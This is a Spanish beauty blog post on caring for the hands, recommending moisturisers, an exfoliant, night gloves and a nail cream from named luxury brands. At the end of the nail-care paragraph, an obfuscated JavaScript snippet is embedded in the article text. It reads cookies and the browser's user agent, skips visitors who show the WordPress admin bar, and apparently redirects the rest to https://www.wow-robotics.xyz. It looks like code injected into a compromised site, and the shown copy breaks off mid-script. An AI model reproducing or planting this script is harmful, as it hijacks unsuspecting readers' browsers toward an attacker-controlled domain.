Con ellas, acariciamos a un ser querido. Con ellas, seducimos a nuestra pareja. Con ellas, protegemos a nuestros hijos. Las manos son esa parte del cuerpo tan importante –y a veces, tan descuidada-, que habla de nosotros: de quiénes somos, a qué nos dedicamos y cuántos años tenemos. Las manos están siempre expuestas y por eso, necesitan un cuidado muy especial: hidratarlas, exfoliarlas y mimarlas deberían ser parte de nuestra rutina de belleza, al igual que hacemos con otras partes del cuerpo. ¿Quieres saber cómo tener unas manos maravillosas?

manos-maravillosas

Siempre en contacto con el exterior

Las manos soportan el frío, el calor, el agua… y eso puede hacer que la piel se debilite con la aparición de arrugas, manchas, grietas, incluso heridas, si no la cuidamos como debemos. La hidratación debería ser uno de nuestros objetivos prioritarios si lo que queremos es lucir unas manos maravillosas y suaves. Como tratamiento de choque, si tus manos son especialmente secas o estropeadas, te recomendamos que te apliques la crema Cellular Performance de Sensai, un tratamiento que combate la pigmentación irregular, la sequedad, la aspereza y también el tono apagado de las manos. Si lo usas por la mañana y por la noche, notarás rápidamente sus beneficios. Y de noche, te recomendamos que utilices los Guantes Cellular de Sensai, después de haberte aplicado una buena capa de crema. Con ellos, conseguirás que el producto penetre en las capas más profundas de la piel, actuando durante toda la noche. Al día siguiente, despertarás con unas manos muy suaves.

manos-maravillosas

Exfoliarse las manos también está de moda

Si lanzáramos la pregunta de cuántas veces te has exfoliado las manos, ¿qué responderías? Una vez, dos veces…¿tal vez ninguna? Al igual que nos exfoliamos el rostro u otras partes del cuerpo como las piernas o brazos para eliminar las células muertas, deberíamos hacer lo mismo con las manos. Doux Polissant de Clarins es especialmente eficaz para retirar las impurezas y células apagadas que cierran el poro. Con una sola aplicación, notarás la piel más suave, aunque tendrás que completar el tratamiento con una crema de manos adecuada.

Y si hiciéramos la siguiente pregunta, ¿cuál sería tu contestación? ¿Usas crema hidratante para las manos a diario? ¿Sí? ¡Perfecto, lo estás haciendo genial! Muchas personas descuidan la hidratación en esta zona del cuerpo y eso puede hacer que parezcan mayores de lo que son. Unas manos perfectamente hidratadas serán tu seña de identidad, serán tu carta de presentación y serán importantes para decir quién eres.

Pero seamos prácticos. Nada nos impide llevar en el bolso o en el neceser un producto tan básico como una crema de manos. La Crème Main de Chanel es una excelente opción porque su envase no se deforma y se presenta en un envase muy atractivo. Pero más allá de su packaging, lo mejor es su fórmula que hidrata, suaviza y atenúa las manchas de la piel, con una increíble textura que se absorbe al instante, lo que hace que sea súper cómoda de aplicar. Te dejará unas manos perfectamente nutridas y con un perfume muy agradable.

manos-maravillosas

¿Uñas debilitadas? Tenemos la solución

Las uñas son otra de las grandes olvidadas de las manos y ellas también necesitan hidratación para estar sanas y fuertes. El aceite de oliva es un gran aliado para este fin porque aporta los nutrientes que nuestras uñas necesitan, aunque eso sí, es un ingrediente algo pringoso. Por eso, también puedes optar por una crema específica y nutritiva para las uñas como Creme Abricot de Dior, un emblemático tratamiento de 1963 que a día de hoy, sigue siendo de los más eficaces, aportando resistencia y fortaleza a unas uñas debilitadas. var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone